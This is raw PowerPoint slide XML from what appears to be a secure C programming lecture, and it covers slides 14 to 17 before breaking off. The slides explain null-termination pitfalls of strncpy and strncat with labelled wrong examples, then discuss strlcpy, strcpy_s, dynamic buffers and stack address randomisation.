            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>However, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>() and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> can be easily </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0" smtClean="0"/>
              <a:t>misused</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> and can still be dangerous.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="3124200"/>
            <a:ext cx="8458200" cy="914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sz="2000" dirty="0" smtClean="0"/>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>[8];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>));</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>// Wrong: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t> may not be null-terminated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="4343400"/>
            <a:ext cx="8458200" cy="1676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sz="2000" dirty="0" smtClean="0"/>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(BUF_SIZE);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>default_value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, BUF_SIZE - 1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>// Wrong: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t> may not be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>null-terminated as there may be no extra space for null</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>another_buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>, BUF_SIZE - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strlen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1"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6B6F2A8-F4EE-4EC9-AA14-CC2A74725EE5}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="609600"/>
            <a:ext cx="7772400" cy="6019800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Some suggest using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strlcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strlcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> respectively.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strlcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>(char * restrict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>, const char * restrict </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>dstsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>dstsize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> parameter should be the full size of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Copies up to dstsize-1 characters from the NUL-terminated string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> and guaranteed to NUL-terminates the result.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>However, some said that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strlcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strlcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>are “horribly inefficient” and may lead to other errors caused by truncating the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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6B6F2A8-F4EE-4EC9-AA14-CC2A74725EE5}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="609600"/>
            <a:ext cx="7772400" cy="6019800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Some suggest using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strcat_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>instead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>errno_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" kern="1200" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>strcpy_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" kern="1200" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>strDestination</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" kern="1200" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" kern="1200" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>numberOfElements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" kern="1200" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, const char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>strSource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" kern="1200" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>numberOfElements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> parameter is used to check that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strSource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> is not bigger than the buffer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Otherwise, an error code is returned.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Upon successful execution, the destination string is always null-terminated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>However, to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>strcat_s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>we need Visual Studio 2005 (or newer) or the compiler has to be at least C11 or C++17</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07EE4F2A-B340-47AB-B040-95FB8027243C}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="457200"/>
            <a:ext cx="7772400" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Static vs. dynamically allocated buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Fix length buffer may be exploitable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Dynamically (re-)allocate all strings instead of using fixed-size buffers is recommended. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Must be prepared for dynamic allocation to fail.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Designed to be fail-safe when memory is exhausted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Random stack address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>It can minimize the chance of success for buffer overflow.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>However, if a hacker tries many times, it is still possible to success.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704F5E1A-2E9F-4738-8DF5-D82B1473CB76}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="457200"/>
            <a:ext cx="7772400" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Avoid installing set-user-id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
